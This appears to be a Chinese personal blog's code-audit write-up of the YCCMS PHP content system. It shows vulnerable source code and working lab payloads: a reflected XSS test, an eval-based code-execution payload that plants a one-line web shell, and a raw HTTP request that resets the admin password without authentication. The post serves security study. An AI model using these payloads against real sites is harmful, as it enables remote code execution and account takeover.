<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>001-yccms代码审计 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="xss漏洞seay进行漏洞检测发现xss漏洞，此处原本不叫1.php，是乱码名称的php文件，为了演示，特此改名。 ![image-20220725123257358](..&#x2F;..&#x2F;..&#x2F;Library&#x2F;Application Support&#x2F;typora-user-images&#x2F;image-20220725123257358.png)">
<meta property="og:type" content="article">
<meta property="og:title" content="001-yccms代码审计">
<meta property="og:url" content="http://example.com/2022/07/24/001-yccms%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="xss漏洞seay进行漏洞检测发现xss漏洞，此处原本不叫1.php，是乱码名称的php文件，为了演示，特此改名。 ![image-20220725123257358](..&#x2F;..&#x2F;..&#x2F;Library&#x2F;Application Support&#x2F;typora-user-images&#x2F;image-20220725123257358.png)">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2022-07-24T08:00:39.000Z">
<meta property="article:modified_time" content="2022-07-25T11:05:34.825Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
<meta name="generator" content="Hexo 6.2.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-001-yccms代码审计" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2022/07/24/001-yccms%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" class="article-date">
  <time class="dt-published" datetime="2022-07-24T08:00:39.000Z" itemprop="datePublished">2022-07-24</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      001-yccms代码审计
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h3 id="xss漏洞"><a href="#xss漏洞" class="headerlink" title="xss漏洞"></a>xss漏洞</h3><p>seay进行漏洞检测发现xss漏洞，此处原本不叫1.php，是乱码名称的php文件，为了演示，特此改名。</p>
<p>![image-20220725123257358](..&#x2F;..&#x2F;..&#x2F;Library&#x2F;Application Support&#x2F;typora-user-images&#x2F;image-20220725123257358.png)</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">if</span> (<span class="variable">$_GET</span>[<span class="string">&#x27;art&#x27;</span>]): <span class="meta">?&gt;</span></span><br><span class="line">&lt;dd&gt;&lt;span <span class="class"><span class="keyword">class</span>=&quot;<span class="title">state</span>&quot;&gt;内容生成完毕 !共 &lt;?<span class="title">php</span> <span class="title">echo</span> $<span class="title">_GET</span>[&#x27;<span class="title">art</span>&#x27;]; ?&gt;</span></span><br><span class="line"><span class="class"> 条。&lt;/<span class="title">span</span>&gt;&lt;/<span class="title">dd</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>网站测试：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/compile/1.php?art=<span class="tag">&lt;<span class="name">script</span>&gt;</span>alert(1);<span class="tag">&lt;/<span class="name">script</span>&gt;</span>  </span><br></pre></td></tr></table></figure>

<p>发现漏洞确实存在</p>
<p>![image-20220725123120708](&#x2F;Users&#x2F;chendafa&#x2F;Library&#x2F;Application Support&#x2F;typora-user-images&#x2F;image-20220725123120708.png)</p>
<h3 id="命令执行漏洞"><a href="#命令执行漏洞" class="headerlink" title="命令执行漏洞"></a>命令执行漏洞</h3><p>&#x2F;public&#x2F;class&#x2F;Factory.class.php</p>
<p>![image-20220725123936319](..&#x2F;..&#x2F;..&#x2F;Library&#x2F;Application Support&#x2F;typora-user-images&#x2F;image-20220725123936319.png)</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Factory</span></span>&#123;</span><br><span class="line">	<span class="built_in">static</span> <span class="keyword">private</span> <span class="variable">$_obj</span>=<span class="literal">null</span>;</span><br><span class="line">	<span class="built_in">static</span> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">setAction</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">		<span class="variable">$_a</span>=<span class="built_in">self</span>::<span class="title function_ invoke__">getA</span>();</span><br><span class="line">		<span class="keyword">if</span> (<span class="title function_ invoke__">in_array</span>(<span class="variable">$_a</span>, <span class="keyword">array</span>(<span class="string">&#x27;admin&#x27;</span>, <span class="string">&#x27;nav&#x27;</span>, <span class="string">&#x27;article&#x27;</span>,<span class="string">&#x27;backup&#x27;</span>,<span class="string">&#x27;html&#x27;</span>,<span class="string">&#x27;link&#x27;</span>,<span class="string">&#x27;pic&#x27;</span>,<span class="string">&#x27;search&#x27;</span>,<span class="string">&#x27;system&#x27;</span>,<span class="string">&#x27;xml&#x27;</span>,<span class="string">&#x27;online&#x27;</span>))) &#123;</span><br><span class="line">			<span class="keyword">if</span> (!<span class="keyword">isset</span>(<span class="variable">$_SESSION</span>[<span class="string">&#x27;admin&#x27;</span>])) &#123;</span><br><span class="line">				<span class="title function_ invoke__">header</span>(<span class="string">&#x27;Location:&#x27;</span>.<span class="string">&#x27;?a=login&#x27;</span>);</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">if</span> (!<span class="title function_ invoke__">file_exists</span>(ROOT_PATH.<span class="string">&#x27;/controller/&#x27;</span>.<span class="title function_ invoke__">ucfirst</span>(<span class="variable">$_a</span>).<span class="string">&#x27;Action.class.php&#x27;</span>)) <span class="variable">$_a</span> = <span class="string">&#x27;Login&#x27;</span>;</span><br><span class="line">		<span class="keyword">eval</span>(<span class="string">&#x27;self::$_obj = new &#x27;</span>.<span class="title function_ invoke__">ucfirst</span>(<span class="variable">$_a</span>).<span class="string">&#x27;Action();&#x27;</span>);</span><br><span class="line">		<span class="keyword">return</span> <span class="built_in">self</span>::<span class="variable">$_obj</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	</span><br><span class="line">	<span class="built_in">static</span> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">setModel</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">		<span class="variable">$_a</span> = <span class="built_in">self</span>::<span class="title function_ invoke__">getA</span>();</span><br><span class="line">		<span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(ROOT_PATH.<span class="string">&#x27;/model/&#x27;</span>.<span class="variable">$_a</span>.<span class="string">&#x27;Model.class.php&#x27;</span>)) <span class="keyword">eval</span>(<span class="string">&#x27;self::$_obj = new &#x27;</span>.<span class="title function_ invoke__">ucfirst</span>(<span class="variable">$_a</span>).<span class="string">&#x27;Model();&#x27;</span>);</span><br><span class="line">		<span class="keyword">return</span> <span class="built_in">self</span>::<span class="variable">$_obj</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="built_in">static</span> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">getA</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">		<span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;a&#x27;</span>]) &amp;&amp; !<span class="keyword">empty</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;a&#x27;</span>]))&#123;</span><br><span class="line">			<span class="keyword">return</span> <span class="variable">$_GET</span>[<span class="string">&#x27;a&#x27;</span>];</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">return</span> <span class="string">&#x27;login&#x27;</span>;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>getA()：如果get方式传入a值 且a不为空 则会返回a 赋值给$_a</p>
<p>ucfirst()：首字母大写</p>
<p>file_exits()：函数允许路径中存在特殊字符，有..&#x2F;会返回上级目录，此处可以通过目录穿越绕过if判断，使$_a不为Login，而是我们传入的值，然后通过eval代码执行达到利用</p>
<p>要想执行eval，去哪儿调用？ucfirst前有一个 new，说明实例化了一个对象，我们也可以实例化Factory()</p>
<p>构造： Factory();phpinfo();&#x2F;&#x2F;..&#x2F;</p>
<p>ROOT_PATH&#x2F;model&#x2F;**Factory();phpinfo();&#x2F;&#x2F;..&#x2F;**Model.class.php</p>
<p>路径相当于：ROOT_PATH&#x2F;model&#x2F;Model.class.php「确实存在」</p>
<p>命令相当于phpinfo()，后面内容被&#x2F;&#x2F;注释了</p>
<p>要让某处调用Factory()这个类 发现&#x2F;config&#x2F;run.inc.php调用了Factory() 。查找包含&#x2F;config&#x2F;run.inc.php的文件：&#x2F;admin&#x2F;index.php &#x2F;config&#x2F;count.php &#x2F;search&#x2F;index.php</p>
<p>构造payload：<a target="_blank" rel="noopener" href="http://localhost/yccms/config/count.php?a=Factory();@eval($_POST%5B1%5D);//../">http://localhost/yccms/config/count.php?a=Factory();@eval($_POST[1]);//../</a></p>
<p>使用其他三个文件包含也行</p>
<h3 id="任意密码修改"><a href="#任意密码修改" class="headerlink" title="任意密码修改"></a>任意密码修改</h3><p> &#x2F;controller&#x2F;AdminAction.class.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//修改密码</span></span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">update</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">		<span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;send&#x27;</span>]))&#123;</span><br><span class="line">			<span class="keyword">if</span>(validate::<span class="title function_ invoke__">isNullString</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;username&#x27;</span>])) <span class="title class_">Tool</span>::<span class="title function_ invoke__">t_back</span>(<span class="string">&#x27;用户名不能为空&#x27;</span>,<span class="string">&#x27;?a=admin&amp;m=update&#x27;</span>);</span><br><span class="line">			<span class="keyword">if</span>(validate::<span class="title function_ invoke__">isNullString</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;password&#x27;</span>])) <span class="title class_">Tool</span>::<span class="title function_ invoke__">t_back</span>(<span class="string">&#x27;密码不能为空!&#x27;</span>,<span class="string">&#x27;?a=admin&amp;m=update&#x27;</span>);</span><br><span class="line">			<span class="keyword">if</span>(!(validate::<span class="title function_ invoke__">checkStrEquals</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;password&#x27;</span>], <span class="variable">$_POST</span>[<span class="string">&#x27;notpassword&#x27;</span>]))) <span class="title class_">Tool</span>::<span class="title function_ invoke__">t_back</span>(<span class="string">&#x27;两次密码不一致!&#x27;</span>,<span class="string">&#x27;?a=admin&amp;m=update&#x27;</span>);</span><br><span class="line">			<span class="variable language_">$this</span>-&gt;_model-&gt;username=<span class="variable">$_POST</span>[<span class="string">&#x27;username&#x27;</span>];</span><br><span class="line">			<span class="variable language_">$this</span>-&gt;_model-&gt;password=<span class="title function_ invoke__">sha1</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;password&#x27;</span>]);</span><br><span class="line">			<span class="variable">$_edit</span>=<span class="variable language_">$this</span>-&gt;_model-&gt;<span class="title function_ invoke__">editAdmin</span>();</span><br><span class="line">			<span class="keyword">if</span>(<span class="variable">$_edit</span>)&#123;</span><br><span class="line">				tool::<span class="title function_ invoke__">layer_alert</span>(<span class="string">&#x27;密码修改成功!&#x27;</span>,<span class="string">&#x27;?a=admin&amp;m=update&#x27;</span>,<span class="number">6</span>);</span><br><span class="line">				&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">				tool::<span class="title function_ invoke__">layer_alert</span>(<span class="string">&#x27;密码未修改!&#x27;</span>,<span class="string">&#x27;?a=admin&amp;m=update&#x27;</span>,<span class="number">6</span>);</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br></pre></td></tr></table></figure>

<p>验证用户名和密码不为空，两次密码是否输入一致，但没有对用户身份进行验证。跟踪editAdmin()函数，是一个sql语句</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">editAdmin</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">		<span class="variable">$_sql</span>=<span class="string">&quot;UPDATE</span></span><br><span class="line"><span class="string">					my_admin</span></span><br><span class="line"><span class="string">				SET</span></span><br><span class="line"><span class="string">					username=&#x27;<span class="subst">$this</span>-&gt;username&#x27;,</span></span><br><span class="line"><span class="string">					password=&#x27;<span class="subst">$this</span>-&gt;password&#x27;</span></span><br><span class="line"><span class="string">				WHERE</span></span><br><span class="line"><span class="string">					id=1</span></span><br><span class="line"><span class="string">				LIMIT 1&quot;</span>;</span><br><span class="line">		<span class="keyword">return</span> <span class="built_in">parent</span>::<span class="title function_ invoke__">update</span>(<span class="variable">$_sql</span>);</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>

<p>update的一个操作，对用户传入的参数没有进行过滤。任意用户可以修改管理员密码，进入&#x2F;admin后台，默认账密admin&#x2F;admin</p>
<p>![image-20220725181602475](..&#x2F;..&#x2F;..&#x2F;Library&#x2F;Application Support&#x2F;typora-user-images&#x2F;image-20220725181602475.png)</p>
<p>后台没有校验原密码功能，通过该页面的抓包可以直接在bp端修改密码「用这段流量包，即使不登录admin后台，也可以越权修改任意密码」</p>
<p>![image-20220725182455517](..&#x2F;..&#x2F;..&#x2F;Library&#x2F;Application Support&#x2F;typora-user-images&#x2F;image-20220725182455517.png)</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/yccms/admin/?a=admin&amp;m=update</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>192.168.2.152</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>91</span><br><span class="line"><span class="attribute">Cache-Control</span><span class="punctuation">: </span>max-age=0</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span><span class="punctuation">: </span>1</span><br><span class="line"><span class="attribute">Origin</span><span class="punctuation">: </span>http://192.168.2.152</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/x-www-form-urlencoded</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</span><br><span class="line"><span class="attribute">Referer</span><span class="punctuation">: </span>http://192.168.2.152/yccms/admin/?a=admin&amp;m=update</span><br><span class="line"><span class="attribute">Accept-Encoding</span><span class="punctuation">: </span>gzip, deflate</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>zh-CN,zh;q=0.9</span><br><span class="line"><span class="attribute">Cookie</span><span class="punctuation">: </span>PHPSESSID=5kcd7pa4vav814dflgppq42oj3</span><br><span class="line"><span class="attribute">Connection</span><span class="punctuation">: </span>close</span><br><span class="line"></span><br><span class="line"><span class="language-llvm">username<span class="operator">=</span>admin&amp;password<span class="operator">=</span><span class="number">123111</span>&amp;notpassword<span class="operator">=</span><span class="number">123111</span>&amp;send<span class="operator">=</span><span class="variable">%E4</span><span class="variable">%BF</span><span class="variable">%AE</span><span class="variable">%E6</span><span class="variable">%94</span><span class="variable">%B9</span><span class="variable">%E5</span><span class="variable">%AF</span><span class="variable">%86</span><span class="variable">%E7</span><span class="variable">%A0</span><span class="variable">%81</span></span></span><br></pre></td></tr></table></figure>


      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2022/07/24/001-yccms%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" data-id="cl60q848100011ow6ho5th1k9" data-title="001-yccms代码审计" class="article-share-link">Share</a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2022/07/25/002-thinkphp5-0-22%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          002-thinkphp5.0.22代码审计
        
      </div>
    </a>
  
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a></li></ul>
    </div>
  </div>


  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/07/">July 2022</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2022/07/25/123/">123</a>
          </li>
        
          <li>
            <a href="/2022/07/25/002-thinkphp5-0-22%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">002-thinkphp5.0.22代码审计</a>
          </li>
        
          <li>
            <a href="/2022/07/24/001-yccms%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">001-yccms代码审计</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2022 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.4.1.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>